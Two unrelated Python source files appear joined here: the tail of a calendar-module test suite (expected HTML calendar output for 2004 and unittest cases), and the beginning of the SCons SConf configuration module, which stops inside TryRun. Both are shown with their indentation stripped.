<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">August</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
<tr><td class="mon">30</td><td class="tue">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">September</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">October</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="fri">1</td><td class="sat">2</td><td class="sun">3</td></tr>
<tr><td class="mon">4</td><td class="tue">5</td><td class="wed">6</td><td class="thu">7</td><td class="fri">8</td><td class="sat">9</td><td class="sun">10</td></tr>
<tr><td class="mon">11</td><td class="tue">12</td><td class="wed">13</td><td class="thu">14</td><td class="fri">15</td><td class="sat">16</td><td class="sun">17</td></tr>
<tr><td class="mon">18</td><td class="tue">19</td><td class="wed">20</td><td class="thu">21</td><td class="fri">22</td><td class="sat">23</td><td class="sun">24</td></tr>
<tr><td class="mon">25</td><td class="tue">26</td><td class="wed">27</td><td class="thu">28</td><td class="fri">29</td><td class="sat">30</td><td class="sun">31</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">November</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">December</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="fri">31</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr></table></body>
</html>
"""
class OutputTestCase(unittest.TestCase):
def normalize_calendar(self, s):
# Filters out locale dependant strings
def neitherspacenordigit(c):
return not c.isspace() and not c.isdigit()
lines = []
for line in s.splitlines(False):
# Drop texts, as they are locale dependent
if line and not filter(neitherspacenordigit, line):
lines.append(line)
return lines
def test_output(self):
self.assertEqual(
self.normalize_calendar(calendar.calendar(2004)),
self.normalize_calendar(result_2004_text)
)
def test_output_textcalendar(self):
self.assertEqual(
calendar.TextCalendar().formatyear(2004).strip(),
result_2004_text.strip()
)
def test_output_htmlcalendar(self):
self.assertEqual(
calendar.HTMLCalendar().formatyearpage(2004).strip(),
result_2004_html.strip()
)
class CalendarTestCase(unittest.TestCase):
def test_isleap(self):
# Make sure that the return is right for a few years, and
# ensure that the return values are 1 or 0, not just true or
# false (see SF bug #485794). Specific additional tests may
# be appropriate; this tests a single "cycle".
self.assertEqual(calendar.isleap(2000), 1)
self.assertEqual(calendar.isleap(2001), 0)
self.assertEqual(calendar.isleap(2002), 0)
self.assertEqual(calendar.isleap(2003), 0)
def test_setfirstweekday(self):
self.assertRaises(ValueError, calendar.setfirstweekday, 'flabber')
self.assertRaises(ValueError, calendar.setfirstweekday, -1)
self.assertRaises(ValueError, calendar.setfirstweekday, 200)
orig = calendar.firstweekday()
calendar.setfirstweekday(calendar.SUNDAY)
self.assertEqual(calendar.firstweekday(), calendar.SUNDAY)
calendar.setfirstweekday(calendar.MONDAY)
self.assertEqual(calendar.firstweekday(), calendar.MONDAY)
calendar.setfirstweekday(orig)
def test_enumerateweekdays(self):
self.assertRaises(IndexError, calendar.day_abbr.__getitem__, -10)
self.assertRaises(IndexError, calendar.day_name.__getitem__, 10)
self.assertEqual(len([d for d in calendar.day_abbr]), 7)
def test_days(self):
for attr in "day_name", "day_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 7)
self.assertEqual(len(value[:]), 7)
# ensure they're all unique
self.assertEqual(len(set(value)), 7)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
def test_months(self):
for attr in "month_name", "month_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 13)
self.assertEqual(len(value[:]), 13)
self.assertEqual(value[0], "")
# ensure they're all unique
self.assertEqual(len(set(value)), 13)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
class MonthCalendarTestCase(unittest.TestCase):
def setUp(self):
self.oldfirstweekday = calendar.firstweekday()
calendar.setfirstweekday(self.firstweekday)
def tearDown(self):
calendar.setfirstweekday(self.oldfirstweekday)
def check_weeks(self, year, month, weeks):
cal = calendar.monthcalendar(year, month)
self.assertEqual(len(cal), len(weeks))
for i in xrange(len(weeks)):
self.assertEqual(weeks[i], sum(day != 0 for day in cal[i]))
class MondayTestCase(MonthCalendarTestCase):
firstweekday = calendar.MONDAY
def test_february(self):
# A 28-day february starting on monday (7+7+7+7 days)
self.check_weeks(1999, 2, (7, 7, 7, 7))
# A 28-day february starting on tuesday (6+7+7+7+1 days)
self.check_weeks(2005, 2, (6, 7, 7, 7, 1))
# A 28-day february starting on sunday (1+7+7+7+6 days)
self.check_weeks(1987, 2, (1, 7, 7, 7, 6))
# A 29-day february starting on monday (7+7+7+7+1 days)
self.check_weeks(1988, 2, (7, 7, 7, 7, 1))
# A 29-day february starting on tuesday (6+7+7+7+2 days)
self.check_weeks(1972, 2, (6, 7, 7, 7, 2))
# A 29-day february starting on sunday (1+7+7+7+7 days)
self.check_weeks(2004, 2, (1, 7, 7, 7, 7))
def test_april(self):
# A 30-day april starting on monday (7+7+7+7+2 days)
self.check_weeks(1935, 4, (7, 7, 7, 7, 2))
# A 30-day april starting on tuesday (6+7+7+7+3 days)
self.check_weeks(1975, 4, (6, 7, 7, 7, 3))
# A 30-day april starting on sunday (1+7+7+7+7+1 days)
self.check_weeks(1945, 4, (1, 7, 7, 7, 7, 1))
# A 30-day april starting on saturday (2+7+7+7+7 days)
self.check_weeks(1995, 4, (2, 7, 7, 7, 7))
# A 30-day april starting on friday (3+7+7+7+6 days)
self.check_weeks(1994, 4, (3, 7, 7, 7, 6))
def test_december(self):
# A 31-day december starting on monday (7+7+7+7+3 days)
self.check_weeks(1980, 12, (7, 7, 7, 7, 3))
# A 31-day december starting on tuesday (6+7+7+7+4 days)
self.check_weeks(1987, 12, (6, 7, 7, 7, 4))
# A 31-day december starting on sunday (1+7+7+7+7+2 days)
self.check_weeks(1968, 12, (1, 7, 7, 7, 7, 2))
# A 31-day december starting on thursday (4+7+7+7+6 days)
self.check_weeks(1988, 12, (4, 7, 7, 7, 6))
# A 31-day december starting on friday (3+7+7+7+7 days)
self.check_weeks(2017, 12, (3, 7, 7, 7, 7))
# A 31-day december starting on saturday (2+7+7+7+7+1 days)
self.check_weeks(2068, 12, (2, 7, 7, 7, 7, 1))
class SundayTestCase(MonthCalendarTestCase):
firstweekday = calendar.SUNDAY
def test_february(self):
# A 28-day february starting on sunday (7+7+7+7 days)
self.check_weeks(2009, 2, (7, 7, 7, 7))
# A 28-day february starting on monday (6+7+7+7+1 days)
self.check_weeks(1999, 2, (6, 7, 7, 7, 1))
# A 28-day february starting on saturday (1+7+7+7+6 days)
self.check_weeks(1997, 2, (1, 7, 7, 7, 6))
# A 29-day february starting on sunday (7+7+7+7+1 days)
self.check_weeks(2004, 2, (7, 7, 7, 7, 1))
# A 29-day february starting on monday (6+7+7+7+2 days)
self.check_weeks(1960, 2, (6, 7, 7, 7, 2))
# A 29-day february starting on saturday (1+7+7+7+7 days)
self.check_weeks(1964, 2, (1, 7, 7, 7, 7))
def test_april(self):
# A 30-day april starting on sunday (7+7+7+7+2 days)
self.check_weeks(1923, 4, (7, 7, 7, 7, 2))
# A 30-day april starting on monday (6+7+7+7+3 days)
self.check_weeks(1918, 4, (6, 7, 7, 7, 3))
# A 30-day april starting on saturday (1+7+7+7+7+1 days)
self.check_weeks(1950, 4, (1, 7, 7, 7, 7, 1))
# A 30-day april starting on friday (2+7+7+7+7 days)
self.check_weeks(1960, 4, (2, 7, 7, 7, 7))
# A 30-day april starting on thursday (3+7+7+7+6 days)
self.check_weeks(1909, 4, (3, 7, 7, 7, 6))
def test_december(self):
# A 31-day december starting on sunday (7+7+7+7+3 days)
self.check_weeks(2080, 12, (7, 7, 7, 7, 3))
# A 31-day december starting on monday (6+7+7+7+4 days)
self.check_weeks(1941, 12, (6, 7, 7, 7, 4))
# A 31-day december starting on saturday (1+7+7+7+7+2 days)
self.check_weeks(1923, 12, (1, 7, 7, 7, 7, 2))
# A 31-day december starting on wednesday (4+7+7+7+6 days)
self.check_weeks(1948, 12, (4, 7, 7, 7, 6))
# A 31-day december starting on thursday (3+7+7+7+7 days)
self.check_weeks(1927, 12, (3, 7, 7, 7, 7))
# A 31-day december starting on friday (2+7+7+7+7+1 days)
self.check_weeks(1995, 12, (2, 7, 7, 7, 7, 1))
def test_main():
test_support.run_unittest(
OutputTestCase,
CalendarTestCase,
MondayTestCase,
SundayTestCase
)
if __name__ == "__main__":
test_main()
| |
"""SCons.SConf
Autoconf-like configuration support.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import SCons.compat
import io
import os
import re
import sys
import traceback
import SCons.Action
import SCons.Builder
import SCons.Errors
import SCons.Job
import SCons.Node.FS
import SCons.Taskmaster
import SCons.Util
import SCons.Warnings
import SCons.Conftest
from SCons.Debug import Trace
# Turn off the Conftest error logging
SCons.Conftest.LogInputFiles = 0
SCons.Conftest.LogErrorMessages = 0
# Set
build_type = None
build_types = ['clean', 'help']
def SetBuildType(type):
global build_type
build_type = type
# to be set, if we are in dry-run mode
dryrun = 0
AUTO=0 # use SCons dependency scanning for up-to-date checks
FORCE=1 # force all tests to be rebuilt
CACHE=2 # force all tests to be taken from cache (raise an error, if necessary)
cache_mode = AUTO
def SetCacheMode(mode):
"""Set the Configure cache mode. mode must be one of "auto", "force",
or "cache"."""
global cache_mode
if mode == "auto":
cache_mode = AUTO
elif mode == "force":
cache_mode = FORCE
elif mode == "cache":
cache_mode = CACHE
else:
raise ValueError("SCons.SConf.SetCacheMode: Unknown mode " + mode)
progress_display = SCons.Util.display # will be overwritten by SCons.Script
def SetProgressDisplay(display):
"""Set the progress display to use (called from SCons.Script)"""
global progress_display
progress_display = display
SConfFS = None
_ac_build_counter = 0 # incremented, whenever TryBuild is called
_ac_config_logs = {} # all config.log files created in this build
_ac_config_hs = {} # all config.h files created in this build
sconf_global = None # current sconf object
def _createConfigH(target, source, env):
t = open(str(target[0]), "w")
defname = re.sub('[^A-Za-z0-9_]', '_', str(target[0]).upper())
t.write("""#ifndef %(DEFNAME)s_SEEN
#define %(DEFNAME)s_SEEN
""" % {'DEFNAME' : defname})
t.write(source[0].get_contents())
t.write("""
#endif /* %(DEFNAME)s_SEEN */
""" % {'DEFNAME' : defname})
t.close()
def _stringConfigH(target, source, env):
return "scons: Configure: creating " + str(target[0])
def CreateConfigHBuilder(env):
"""Called just before the building targets phase begins."""
if len(_ac_config_hs) == 0:
return
action = SCons.Action.Action(_createConfigH,
_stringConfigH)
sconfigHBld = SCons.Builder.Builder(action=action)
env.Append( BUILDERS={'SConfigHBuilder':sconfigHBld} )
for k in _ac_config_hs.keys():
env.SConfigHBuilder(k, env.Value(_ac_config_hs[k]))
class SConfWarning(SCons.Warnings.Warning):
pass
SCons.Warnings.enableWarningClass(SConfWarning)
# some error definitions
class SConfError(SCons.Errors.UserError):
def __init__(self,msg):
SCons.Errors.UserError.__init__(self,msg)
class ConfigureDryRunError(SConfError):
"""Raised when a file or directory needs to be updated during a Configure
process, but the user requested a dry-run"""
def __init__(self,target):
if not isinstance(target, SCons.Node.FS.File):
msg = 'Cannot create configure directory "%s" within a dry-run.' % str(target)
else:
msg = 'Cannot update configure test "%s" within a dry-run.' % str(target)
SConfError.__init__(self,msg)
class ConfigureCacheError(SConfError):
"""Raised when a use explicitely requested the cache feature, but the test
is run the first time."""
def __init__(self,target):
SConfError.__init__(self, '"%s" is not yet built and cache is forced.' % str(target))
# define actions for building text files
def _createSource( target, source, env ):
fd = open(str(target[0]), "w")
fd.write(source[0].get_contents())
fd.close()
def _stringSource( target, source, env ):
return (str(target[0]) + ' <-\n |' +
source[0].get_contents().replace( '\n', "\n |" ) )
class SConfBuildInfo(SCons.Node.FS.FileBuildInfo):
"""
Special build info for targets of configure tests. Additional members
are result (did the builder succeed last time?) and string, which
contains messages of the original build phase.
"""
result = None # -> 0/None -> no error, != 0 error
string = None # the stdout / stderr output when building the target
def set_build_result(self, result, string):
self.result = result
self.string = string
class Streamer(object):
"""
'Sniffer' for a file-like writable object. Similar to the unix tool tee.
"""
def __init__(self, orig):
self.orig = orig
self.s = io.StringIO()
def write(self, str):
if self.orig:
self.orig.write(str)
self.s.write(str)
def writelines(self, lines):
for l in lines:
self.write(l + '\n')
def getvalue(self):
"""
Return everything written to orig since the Streamer was created.
"""
return self.s.getvalue()
def flush(self):
if self.orig:
self.orig.flush()
self.s.flush()
class SConfBuildTask(SCons.Taskmaster.AlwaysTask):
"""
This is almost the same as SCons.Script.BuildTask. Handles SConfErrors
correctly and knows about the current cache_mode.
"""
def display(self, message):
if sconf_global.logstream:
sconf_global.logstream.write("scons: Configure: " + message + "\n")
def display_cached_string(self, bi):
"""
Logs the original builder messages, given the SConfBuildInfo instance
bi.
"""
if not isinstance(bi, SConfBuildInfo):
SCons.Warnings.warn(SConfWarning,
"The stored build information has an unexpected class: %s" % bi.__class__)
else:
self.display("The original builder output was:\n" +
(" |" + str(bi.string)).replace("\n", "\n |"))
def failed(self):
# check, if the reason was a ConfigureDryRunError or a
# ConfigureCacheError and if yes, reraise the exception
exc_type = self.exc_info()[0]
if issubclass(exc_type, SConfError):
raise
elif issubclass(exc_type, SCons.Errors.BuildError):
# we ignore Build Errors (occurs, when a test doesn't pass)
# Clear the exception to prevent the contained traceback
# to build a reference cycle.
self.exc_clear()
else:
self.display('Caught exception while building "%s":\n' %
self.targets[0])
try:
excepthook = sys.excepthook
except AttributeError:
# Earlier versions of Python don't have sys.excepthook...
def excepthook(type, value, tb):
traceback.print_tb(tb)
print type, value
excepthook(*self.exc_info())
return SCons.Taskmaster.Task.failed(self)
def collect_node_states(self):
# returns (is_up_to_date, cached_error, cachable)
# where is_up_to_date is 1, if the node(s) are up_to_date
# cached_error is 1, if the node(s) are up_to_date, but the
# build will fail
# cachable is 0, if some nodes are not in our cache
T = 0
changed = False
cached_error = False
cachable = True
for t in self.targets:
if T: Trace('%s' % (t))
bi = t.get_stored_info().binfo
if isinstance(bi, SConfBuildInfo):
if T: Trace(': SConfBuildInfo')
if cache_mode == CACHE:
t.set_state(SCons.Node.up_to_date)
if T: Trace(': set_state(up_to-date)')
else:
if T: Trace(': get_state() %s' % t.get_state())
if T: Trace(': changed() %s' % t.changed())
if (t.get_state() != SCons.Node.up_to_date and t.changed()):
changed = True
if T: Trace(': changed %s' % changed)
cached_error = cached_error or bi.result
else:
if T: Trace(': else')
# the node hasn't been built in a SConf context or doesn't
# exist
cachable = False
changed = ( t.get_state() != SCons.Node.up_to_date )
if T: Trace(': changed %s' % changed)
if T: Trace('\n')
return (not changed, cached_error, cachable)
def execute(self):
if not self.targets[0].has_builder():
return
sconf = sconf_global
is_up_to_date, cached_error, cachable = self.collect_node_states()
if cache_mode == CACHE and not cachable:
raise ConfigureCacheError(self.targets[0])
elif cache_mode == FORCE:
is_up_to_date = 0
if cached_error and is_up_to_date:
self.display("Building \"%s\" failed in a previous run and all "
"its sources are up to date." % str(self.targets[0]))
binfo = self.targets[0].get_stored_info().binfo
self.display_cached_string(binfo)
raise SCons.Errors.BuildError # will be 'caught' in self.failed
elif is_up_to_date:
self.display("\"%s\" is up to date." % str(self.targets[0]))
binfo = self.targets[0].get_stored_info().binfo
self.display_cached_string(binfo)
elif dryrun:
raise ConfigureDryRunError(self.targets[0])
else:
# note stdout and stderr are the same here
s = sys.stdout = sys.stderr = Streamer(sys.stdout)
try:
env = self.targets[0].get_build_env()
if cache_mode == FORCE:
# Set up the Decider() to force rebuilds by saying
# that every source has changed. Note that we still
# call the environment's underlying source decider so
# that the correct .sconsign info will get calculated
# and keep the build state consistent.
def force_build(dependency, target, prev_ni,
env_decider=env.decide_source):
env_decider(dependency, target, prev_ni)
return True
if env.decide_source.func_code is not force_build.func_code:
env.Decider(force_build)
env['PSTDOUT'] = env['PSTDERR'] = s
try:
sconf.cached = 0
self.targets[0].build()
finally:
sys.stdout = sys.stderr = env['PSTDOUT'] = \
env['PSTDERR'] = sconf.logstream
except KeyboardInterrupt:
raise
except SystemExit:
exc_value = sys.exc_info()[1]
raise SCons.Errors.ExplicitExit(self.targets[0],exc_value.code)
except Exception, e:
for t in self.targets:
binfo = t.get_binfo()
binfo.__class__ = SConfBuildInfo
binfo.set_build_result(1, s.getvalue())
sconsign_entry = SCons.SConsign.SConsignEntry()
sconsign_entry.binfo = binfo
#sconsign_entry.ninfo = self.get_ninfo()
# We'd like to do this as follows:
# t.store_info(binfo)
# However, we need to store it as an SConfBuildInfo
# object, and store_info() will turn it into a
# regular FileNodeInfo if the target is itself a
# regular File.
sconsign = t.dir.sconsign()
sconsign.set_entry(t.name, sconsign_entry)
sconsign.merge()
raise e
else:
for t in self.targets:
binfo = t.get_binfo()
binfo.__class__ = SConfBuildInfo
binfo.set_build_result(0, s.getvalue())
sconsign_entry = SCons.SConsign.SConsignEntry()
sconsign_entry.binfo = binfo
#sconsign_entry.ninfo = self.get_ninfo()
# We'd like to do this as follows:
# t.store_info(binfo)
# However, we need to store it as an SConfBuildInfo
# object, and store_info() will turn it into a
# regular FileNodeInfo if the target is itself a
# regular File.
sconsign = t.dir.sconsign()
sconsign.set_entry(t.name, sconsign_entry)
sconsign.merge()
class SConfBase(object):
"""This is simply a class to represent a configure context. After
creating a SConf object, you can call any tests. After finished with your
tests, be sure to call the Finish() method, which returns the modified
environment.
Some words about caching: In most cases, it is not necessary to cache
Test results explicitely. Instead, we use the scons dependency checking
mechanism. For example, if one wants to compile a test program
(SConf.TryLink), the compiler is only called, if the program dependencies
have changed. However, if the program could not be compiled in a former
SConf run, we need to explicitely cache this error.
"""
def __init__(self, env, custom_tests = {}, conf_dir='$CONFIGUREDIR',
log_file='$CONFIGURELOG', config_h = None, _depth = 0):
"""Constructor. Pass additional tests in the custom_tests-dictinary,
e.g. custom_tests={'CheckPrivate':MyPrivateTest}, where MyPrivateTest
defines a custom test.
Note also the conf_dir and log_file arguments (you may want to
build tests in the VariantDir, not in the SourceDir)
"""
global SConfFS
if not SConfFS:
SConfFS = SCons.Node.FS.default_fs or \
SCons.Node.FS.FS(env.fs.pathTop)
if sconf_global is not None:
raise SCons.Errors.UserError
self.env = env
if log_file is not None:
log_file = SConfFS.File(env.subst(log_file))
self.logfile = log_file
self.logstream = None
self.lastTarget = None
self.depth = _depth
self.cached = 0 # will be set, if all test results are cached
# add default tests
default_tests = {
'CheckCC' : CheckCC,
'CheckCXX' : CheckCXX,
'CheckSHCC' : CheckSHCC,
'CheckSHCXX' : CheckSHCXX,
'CheckFunc' : CheckFunc,
'CheckType' : CheckType,
'CheckTypeSize' : CheckTypeSize,
'CheckDeclaration' : CheckDeclaration,
'CheckHeader' : CheckHeader,
'CheckCHeader' : CheckCHeader,
'CheckCXXHeader' : CheckCXXHeader,
'CheckLib' : CheckLib,
'CheckLibWithHeader' : CheckLibWithHeader,
}
self.AddTests(default_tests)
self.AddTests(custom_tests)
self.confdir = SConfFS.Dir(env.subst(conf_dir))
if config_h is not None:
config_h = SConfFS.File(config_h)
self.config_h = config_h
self._startup()
def Finish(self):
"""Call this method after finished with your tests:
env = sconf.Finish()
"""
self._shutdown()
return self.env
def Define(self, name, value = None, comment = None):
"""
Define a pre processor symbol name, with the optional given value in the
current config header.
If value is None (default), then #define name is written. If value is not
none, then #define name value is written.
comment is a string which will be put as a C comment in the
header, to explain the meaning of the value (appropriate C comments /* and
*/ will be put automatically."""
lines = []
if comment:
comment_str = "/* %s */" % comment
lines.append(comment_str)
if value is not None:
define_str = "#define %s %s" % (name, value)
else:
define_str = "#define %s" % name
lines.append(define_str)
lines.append('')
self.config_h_text = self.config_h_text + '\n'.join(lines)
def BuildNodes(self, nodes):
"""
Tries to build the given nodes immediately. Returns 1 on success,
0 on error.
"""
if self.logstream is not None:
# override stdout / stderr to write in log file
oldStdout = sys.stdout
sys.stdout = self.logstream
oldStderr = sys.stderr
sys.stderr = self.logstream
# the engine assumes the current path is the SConstruct directory ...
old_fs_dir = SConfFS.getcwd()
old_os_dir = os.getcwd()
SConfFS.chdir(SConfFS.Top, change_os_dir=1)
# Because we take responsibility here for writing out our
# own .sconsign info (see SConfBuildTask.execute(), above),
# we override the store_info() method with a null place-holder
# so we really control how it gets written.
for n in nodes:
n.store_info = n.do_not_store_info
ret = 1
try:
# ToDo: use user options for calc
save_max_drift = SConfFS.get_max_drift()
SConfFS.set_max_drift(0)
tm = SCons.Taskmaster.Taskmaster(nodes, SConfBuildTask)
# we don't want to build tests in parallel
jobs = SCons.Job.Jobs(1, tm )
jobs.run()
for n in nodes:
state = n.get_state()
if (state != SCons.Node.executed and
state != SCons.Node.up_to_date):
# the node could not be built. we return 0 in this case
ret = 0
finally:
SConfFS.set_max_drift(save_max_drift)
os.chdir(old_os_dir)
SConfFS.chdir(old_fs_dir, change_os_dir=0)
if self.logstream is not None:
# restore stdout / stderr
sys.stdout = oldStdout
sys.stderr = oldStderr
return ret
def pspawn_wrapper(self, sh, escape, cmd, args, env):
"""Wrapper function for handling piped spawns.
This looks to the calling interface (in Action.py) like a "normal"
spawn, but associates the call with the PSPAWN variable from
the construction environment and with the streams to which we
want the output logged. This gets slid into the construction
environment as the SPAWN variable so Action.py doesn't have to
know or care whether it's spawning a piped command or not.
"""
return self.pspawn(sh, escape, cmd, args, env, self.logstream, self.logstream)
def TryBuild(self, builder, text = None, extension = ""):
"""Low level TryBuild implementation. Normally you don't need to
call that - you can use TryCompile / TryLink / TryRun instead
"""
global _ac_build_counter
# Make sure we have a PSPAWN value, and save the current
# SPAWN value.
try:
self.pspawn = self.env['PSPAWN']
except KeyError:
raise SCons.Errors.UserError('Missing PSPAWN construction variable.')
try:
save_spawn = self.env['SPAWN']
except KeyError:
raise SCons.Errors.UserError('Missing SPAWN construction variable.')
nodesToBeBuilt = []
f = "conftest_" + str(_ac_build_counter)
pref = self.env.subst( builder.builder.prefix )
suff = self.env.subst( builder.builder.suffix )
target = self.confdir.File(pref + f + suff)
try:
# Slide our wrapper into the construction environment as
# the SPAWN function.
self.env['SPAWN'] = self.pspawn_wrapper
sourcetext = self.env.Value(text)
if text is not None:
textFile = self.confdir.File(f + extension)
textFileNode = self.env.SConfSourceBuilder(target=textFile,
source=sourcetext)
nodesToBeBuilt.extend(textFileNode)
source = textFileNode
else:
source = None
nodes = builder(target = target, source = source)
if not SCons.Util.is_List(nodes):
nodes = [nodes]
nodesToBeBuilt.extend(nodes)
result = self.BuildNodes(nodesToBeBuilt)
finally:
self.env['SPAWN'] = save_spawn
_ac_build_counter = _ac_build_counter + 1
if result:
self.lastTarget = nodes[0]
else:
self.lastTarget = None
return result
def TryAction(self, action, text = None, extension = ""):
"""Tries to execute the given action with optional source file
contents <text> and optional source file extension <extension>,
Returns the status (0 : failed, 1 : ok) and the contents of the
output file.
"""
builder = SCons.Builder.Builder(action=action)
self.env.Append( BUILDERS = {'SConfActionBuilder' : builder} )
ok = self.TryBuild(self.env.SConfActionBuilder, text, extension)
del self.env['BUILDERS']['SConfActionBuilder']
if ok:
outputStr = self.lastTarget.get_contents()
return (1, outputStr)
return (0, "")
def TryCompile( self, text, extension):
"""Compiles the program given in text to an env.Object, using extension
as file extension (e.g. '.c'). Returns 1, if compilation was
successful, 0 otherwise. The target is saved in self.lastTarget (for
further processing).
"""
return self.TryBuild(self.env.Object, text, extension)
def TryLink( self, text, extension ):
"""Compiles the program given in text to an executable env.Program,
using extension as file extension (e.g. '.c'). Returns 1, if
compilation was successful, 0 otherwise. The target is saved in
self.lastTarget (for further processing).
"""
return self.TryBuild(self.env.Program, text, extension )
def TryRun(self, text, extension ):
